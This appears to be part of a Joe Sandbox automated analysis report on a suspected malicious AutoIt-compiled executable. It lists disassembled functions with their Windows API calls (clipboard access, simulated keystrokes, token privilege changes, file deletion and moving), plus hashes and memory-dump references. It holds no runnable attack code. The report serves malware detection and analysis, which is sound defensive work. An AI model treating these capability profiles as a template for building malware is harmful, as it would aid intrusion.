                                Function 00C63E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                Download Yara Rule
                                APIs
                                • FreeLibrary.KERNEL32(?,?,?,?,?,00C634E2,?,00000001), ref: 00C63E6D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: FreeLibrary
                                • String ID:
                                • API String ID: 3664257935-0
                                • Opcode ID: 781dc9a3de78bf9c976dfae2bf4d472457e428546183d682f97e9533d85c11db
                                • Instruction ID: 44e43ba4d1194089d8187e5aaf9a09eb6427ebec0ad9a64a466cbd383a92eb35
                                • Opcode Fuzzy Hash: 781dc9a3de78bf9c976dfae2bf4d472457e428546183d682f97e9533d85c11db
                                • Instruction Fuzzy Hash: 26F039B5105792CFCB349F65D4D0856BBE0AF057293248A3EE1E682621C7339A44DF20
                                Function 00C7F92C Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                • Instruction ID: c449e1d71d59e1d7dfecf329eb4ec238e316998d9796f5a914521242831e03f3
                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                • Instruction Fuzzy Hash: CC31D371A00106ABC718DF59D4C0A69FBA6FB49310B24C2A9E55ECB255DB31EEC2DBD0
                                Function 033922A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366580328.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_3390000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                • Instruction ID: 8a9e70e5a3a23992e8332fbe1d1c9cfb470b45af31cb4dd2cd52481b7af9f838
                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                • Instruction Fuzzy Hash: 09E0E67494010EEFDB00EFB8D54969E7FB4EF04301F1005A1FD01D2280D6319D508A72

                                Non-executed Functions

                                Function 00CCF5D0 Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C7AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00C7AF8E
                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 00CCF64E
                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CCF6AD
                                • GetWindowLongW.USER32(?,000000F0), ref: 00CCF6EA
                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CCF711
                                • SendMessageW.USER32 ref: 00CCF737
                                • _wcsncpy.LIBCMT ref: 00CCF7A3
                                • GetKeyState.USER32(00000011), ref: 00CCF7C4
                                • GetKeyState.USER32(00000009), ref: 00CCF7D1
                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00CCF7E7
                                • GetKeyState.USER32(00000010), ref: 00CCF7F1
                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00CCF820
                                • SendMessageW.USER32 ref: 00CCF843
                                • SendMessageW.USER32(?,00001030,?,00CCDE69), ref: 00CCF940
                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 00CCF956
                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00CCF967
                                • SetCapture.USER32(?), ref: 00CCF970
                                • ClientToScreen.USER32(?,?), ref: 00CCF9D4
                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00CCF9E0
                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 00CCF9FA
                                • ReleaseCapture.USER32 ref: 00CCFA05
                                • GetCursorPos.USER32(?), ref: 00CCFA3A
                                • ScreenToClient.USER32(?,?), ref: 00CCFA47
                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CCFAA9
                                • SendMessageW.USER32 ref: 00CCFAD3
                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CCFB12
                                • SendMessageW.USER32 ref: 00CCFB3D
                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00CCFB55
                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00CCFB60
                                • GetCursorPos.USER32(?), ref: 00CCFB81
                                • ScreenToClient.USER32(?,?), ref: 00CCFB8E
                                • GetParent.USER32(?), ref: 00CCFBAA
                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 00CCFC10
                                • SendMessageW.USER32 ref: 00CCFC40
                                • ClientToScreen.USER32(?,?), ref: 00CCFC96
                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00CCFCC2
                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00CCFCEA
                                • SendMessageW.USER32 ref: 00CCFD0D
                                • ClientToScreen.USER32(?,?), ref: 00CCFD57
                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00CCFD87
                                • GetWindowLongW.USER32(?,000000F0), ref: 00CCFE1C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                • String ID: @GUI_DRAGID$F
                                • API String ID: 2516578528-4164748364
                                • Opcode ID: e630032cc8870a8669ec334aad6028a2977c37b53448e7bdb1518b031f7a47d9
                                • Instruction ID: 30c038d19db54e46a41ceb50de5688def9c12e2d671cc4cf857741618061d1a0
                                • Opcode Fuzzy Hash: e630032cc8870a8669ec334aad6028a2977c37b53448e7bdb1518b031f7a47d9
                                • Instruction Fuzzy Hash: 05329A74204245AFDB20DF64C884FAABBEABF48314F144A2DF6A6872B1D731DD42DB51
                                Function 00CCA8DC Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00CCAFDB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: %d/%02d/%02d
                                • API String ID: 3850602802-328681919
                                • Opcode ID: a1cc2fda11cd4fb082faf248eb838426fb9ed68ceffaf44d7f3f0b851a5f4c5f
                                • Instruction ID: 61263beb03dcebc01c393cdb9afdc885abcb947b97c85ba5f6ab3597261e50b9
                                • Opcode Fuzzy Hash: a1cc2fda11cd4fb082faf248eb838426fb9ed68ceffaf44d7f3f0b851a5f4c5f
                                • Instruction Fuzzy Hash: DA12CFB1500248ABEB259F65CC8DFAE7BB8EF45318F10421DF526EB2D0DB718A41DB52
                                Function 00C7F78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                Download Yara Rule
                                APIs
                                • GetForegroundWindow.USER32(00000000,00000000), ref: 00C7F796
                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00CD4388
                                • IsIconic.USER32(000000FF), ref: 00CD4391
                                • ShowWindow.USER32(000000FF,00000009), ref: 00CD439E
                                • SetForegroundWindow.USER32(000000FF), ref: 00CD43A8
                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00CD43BE
                                • GetCurrentThreadId.KERNEL32 ref: 00CD43C5
                                • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00CD43D1
                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00CD43E2
                                • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00CD43EA
                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 00CD43F2
                                • SetForegroundWindow.USER32(000000FF), ref: 00CD43F5
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CD440A
                                • keybd_event.USER32(00000012,00000000), ref: 00CD4415
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CD441F
                                • keybd_event.USER32(00000012,00000000), ref: 00CD4424
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CD442D
                                • keybd_event.USER32(00000012,00000000), ref: 00CD4432
                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00CD443C
                                • keybd_event.USER32(00000012,00000000), ref: 00CD4441
                                • SetForegroundWindow.USER32(000000FF), ref: 00CD4444
                                • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00CD446B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                • String ID: Shell_TrayWnd
                                • API String ID: 4125248594-2988720461
                                • Opcode ID: 58e44c8ca9e2bb786547b586e69fcd737eba08639fffb34feb5cf40527ade5c6
                                • Instruction ID: ea47635c33e6392db8948f90e1aea2c4677f5b12a65872c6dd3a0b17009bd365
                                • Opcode Fuzzy Hash: 58e44c8ca9e2bb786547b586e69fcd737eba08639fffb34feb5cf40527ade5c6
                                • Instruction Fuzzy Hash: 0D3163B1A40358BFEB216B759C8AF7F7E6CEB44B50F104016FB05EA2D0C6B15D41AEA0
                                Function 00C6BDF0 Relevance: 35.6, APIs: 12, Strings: 8, Instructions: 643COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00D222E8,?,00000000,?,00C63E2E,?,00000000,?,00CFDBF0,00000000,?), ref: 00C6BE8B
                                • GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00C63E2E,?,00000000,?,00CFDBF0,00000000,?,00000002), ref: 00C6BEA7
                                • __wsplitpath.LIBCMT ref: 00C6BF19
                                  • Part of subcall function 00C8297D: __wsplitpath_helper.LIBCMT ref: 00C829BD
                                • _wcscpy.LIBCMT ref: 00C6BF31
                                • _wcscat.LIBCMT ref: 00C6BF46
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00C6BF56
                                • _wcscpy.LIBCMT ref: 00C6C03E
                                • _wcscpy.LIBCMT ref: 00C6C1ED
                                • SetCurrentDirectoryW.KERNEL32 ref: 00C6C250
                                  • Part of subcall function 00C8010A: std::exception::exception.LIBCMT ref: 00C8013E
                                  • Part of subcall function 00C8010A: __CxxThrowException@8.LIBCMT ref: 00C80153
                                  • Part of subcall function 00C6C320: _memmove.LIBCMT ref: 00C6C419
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CurrentDirectory_wcscpy$_memmove$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_wcscatstd::exception::exception
                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string$_
                                • API String ID: 2542276039-689609797
                                • Opcode ID: 697e0fcdbd730264a717fa82a31bb75805d2d202e84c71c9a1ddd2aa688e4313
                                • Instruction ID: 884d2d0db1f0725deb412633fa90023ddc256c410e927f92a2f4aa46002dd22f
                                • Opcode Fuzzy Hash: 697e0fcdbd730264a717fa82a31bb75805d2d202e84c71c9a1ddd2aa688e4313
                                • Instruction Fuzzy Hash: 2642A0715083459FD720EF60C891BAFB7E8AF85304F04492EF99687252DB31EA49DB93
                                Function 00C9B9F1 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C9BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C9BF0F
                                  • Part of subcall function 00C9BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C9BF3C
                                  • Part of subcall function 00C9BEC3: GetLastError.KERNEL32 ref: 00C9BF49
                                • _memset.LIBCMT ref: 00C9BA34
                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00C9BA86
                                • CloseHandle.KERNEL32(?), ref: 00C9BA97
                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C9BAAE
                                • GetProcessWindowStation.USER32 ref: 00C9BAC7
                                • SetProcessWindowStation.USER32(00000000), ref: 00C9BAD1
                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C9BAEB
                                  • Part of subcall function 00C9B8B0: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C9B9EC), ref: 00C9B8C5
                                  • Part of subcall function 00C9B8B0: CloseHandle.KERNEL32(?,?,00C9B9EC), ref: 00C9B8D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                • String ID: $default$winsta0
                                • API String ID: 2063423040-1027155976
                                • Opcode ID: a69466da578546b86a4ec0eacc23798168829a4a1d65d18fd828b0edb4cc5d62
                                • Instruction ID: 36902d8dd73981e858f6cec39384a014af356b6bd3227d225b9ad5b839004295
                                • Opcode Fuzzy Hash: a69466da578546b86a4ec0eacc23798168829a4a1d65d18fd828b0edb4cc5d62
                                • Instruction Fuzzy Hash: 62817C71800249BFDF11DFA4EE89AEEBBB9FF08304F144519F925A6160DB318E55EB20
                                Function 00CA6B3F Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 164filestringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C631B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00C631DA
                                  • Part of subcall function 00CA7B9F: __wsplitpath.LIBCMT ref: 00CA7BBC
                                  • Part of subcall function 00CA7B9F: __wsplitpath.LIBCMT ref: 00CA7BCF
                                  • Part of subcall function 00CA7C0C: GetFileAttributesW.KERNEL32(?,00CA6A7B), ref: 00CA7C0D
                                • _wcscat.LIBCMT ref: 00CA6B9D
                                • _wcscat.LIBCMT ref: 00CA6BBB
                                • __wsplitpath.LIBCMT ref: 00CA6BE2
                                • FindFirstFileW.KERNEL32(?,?), ref: 00CA6BF8
                                • _wcscpy.LIBCMT ref: 00CA6C57
                                • _wcscat.LIBCMT ref: 00CA6C6A
                                • _wcscat.LIBCMT ref: 00CA6C7D
                                • lstrcmpiW.KERNEL32(?,?), ref: 00CA6CAB
                                • DeleteFileW.KERNEL32(?), ref: 00CA6CBC
                                • MoveFileW.KERNEL32(?,?), ref: 00CA6CDB
                                • MoveFileW.KERNEL32(?,?), ref: 00CA6CEA
                                • CopyFileW.KERNEL32(?,?,00000000), ref: 00CA6CFF
                                • DeleteFileW.KERNEL32(?), ref: 00CA6D10
                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CA6D37
                                • FindClose.KERNEL32(00000000), ref: 00CA6D53
                                • FindClose.KERNEL32(00000000), ref: 00CA6D61
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteMove$AttributesCopyFirstFullNameNextPath_wcscpylstrcmpi
                                • String ID: \*.*
                                • API String ID: 1867810238-1173974218
                                • Opcode ID: 5e32144bcc2a96c5a01d219ee502e6fe816dcd679352f2f1bfabb74c96ca72ec
                                • Instruction ID: 6993b045ed1a7428c2e88044267abe21a834a4716394a3bfc97536e2f54f312c
                                • Opcode Fuzzy Hash: 5e32144bcc2a96c5a01d219ee502e6fe816dcd679352f2f1bfabb74c96ca72ec
                                • Instruction Fuzzy Hash: C651407290015DAACB21EBA0DC85FDE77BCAF06318F0845D6E55AA7041DB349B89CF61
                                Function 00CB7099 Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                Download Yara Rule
                                APIs
                                • OpenClipboard.USER32(00CFDBF0), ref: 00CB70C3
                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 00CB70D1
                                • GetClipboardData.USER32(0000000D), ref: 00CB70D9
                                • CloseClipboard.USER32 ref: 00CB70E5
                                • GlobalLock.KERNEL32(00000000), ref: 00CB7101
                                • CloseClipboard.USER32 ref: 00CB710B
                                • GlobalUnlock.KERNEL32(00000000), ref: 00CB7120
                                • IsClipboardFormatAvailable.USER32(00000001), ref: 00CB712D
                                • GetClipboardData.USER32(00000001), ref: 00CB7135
                                • GlobalLock.KERNEL32(00000000), ref: 00CB7142
                                • GlobalUnlock.KERNEL32(00000000), ref: 00CB7176
                                • CloseClipboard.USER32 ref: 00CB7283
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                • String ID:
                                • API String ID: 3222323430-0
                                • Opcode ID: 55f452e04bd1086b89c287aa8d15596c43228bd93111c041abb9c1f1966dfaf9
                                • Instruction ID: 22a9f6f6fab43e0230090f324ba0a475b1c599f3b6568aa82a003dd431f959ac
                                • Opcode Fuzzy Hash: 55f452e04bd1086b89c287aa8d15596c43228bd93111c041abb9c1f1966dfaf9
                                • Instruction Fuzzy Hash: 7551A231208341ABD710EF64DCDAFAE77A8AF84B01F004619FA57DA1D1DB71DD05AB62
                                Function 00CAFDD2 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(?,?), ref: 00CAFE03
                                • FindClose.KERNEL32(00000000), ref: 00CAFE57
                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CAFE7C
                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00CAFE93
                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CAFEBA
                                • __swprintf.LIBCMT ref: 00CAFF06
                                • __swprintf.LIBCMT ref: 00CAFF3F
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                • __swprintf.LIBCMT ref: 00CAFF93
                                  • Part of subcall function 00C8234B: __woutput_l.LIBCMT ref: 00C823A4
                                • __swprintf.LIBCMT ref: 00CAFFE1
                                • __swprintf.LIBCMT ref: 00CB0030
                                • __swprintf.LIBCMT ref: 00CB007F
                                • __swprintf.LIBCMT ref: 00CB00CE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l_memmove
                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                • API String ID: 108614129-2428617273
                                • Opcode ID: eba72f7ab813853e8ceaf6c4609693d742871438ef252c65cb609884908bb54c
                                • Instruction ID: 8ef4f42375d0fd9058cf5a816b9549c34223e634a5e246ed0f7e5cca05f5cdb9
                                • Opcode Fuzzy Hash: eba72f7ab813853e8ceaf6c4609693d742871438ef252c65cb609884908bb54c
                                • Instruction Fuzzy Hash: 6AA13FB2408344ABC310EFA4CC95DAFB7ECAF98704F44491DF595C6152EB34EA49DBA2
                                Function 00CB2044 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00CB2065
                                • _wcscmp.LIBCMT ref: 00CB207A
                                • _wcscmp.LIBCMT ref: 00CB2091
                                • GetFileAttributesW.KERNEL32(?), ref: 00CB20A3
                                • SetFileAttributesW.KERNEL32(?,?), ref: 00CB20BD
                                • FindNextFileW.KERNEL32(00000000,?), ref: 00CB20D5
                                • FindClose.KERNEL32(00000000), ref: 00CB20E0
                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00CB20FC
                                • _wcscmp.LIBCMT ref: 00CB2123
                                • _wcscmp.LIBCMT ref: 00CB213A
                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00CB214C
                                • SetCurrentDirectoryW.KERNEL32(00D13A68), ref: 00CB216A
                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CB2174
                                • FindClose.KERNEL32(00000000), ref: 00CB2181
                                • FindClose.KERNEL32(00000000), ref: 00CB2191
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                • String ID: *.*
                                • API String ID: 1803514871-438819550
                                • Opcode ID: 6cfb0d5e11c427db48a614cad029270ccb500fe78d8237000ca353ee99555b82
                                • Instruction ID: a5255a0209c469bc885b1e0369d05bfbc6ae77ae955d84c6625341e3eb4696f1
                                • Opcode Fuzzy Hash: 6cfb0d5e11c427db48a614cad029270ccb500fe78d8237000ca353ee99555b82
                                • Instruction Fuzzy Hash: B231A0725002197ECB24EBA8EC89FDE77AC9F05360F104166E921E6090DB70DF94DB65
                                Function 00CB219F Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00CB21C0
                                • _wcscmp.LIBCMT ref: 00CB21D5
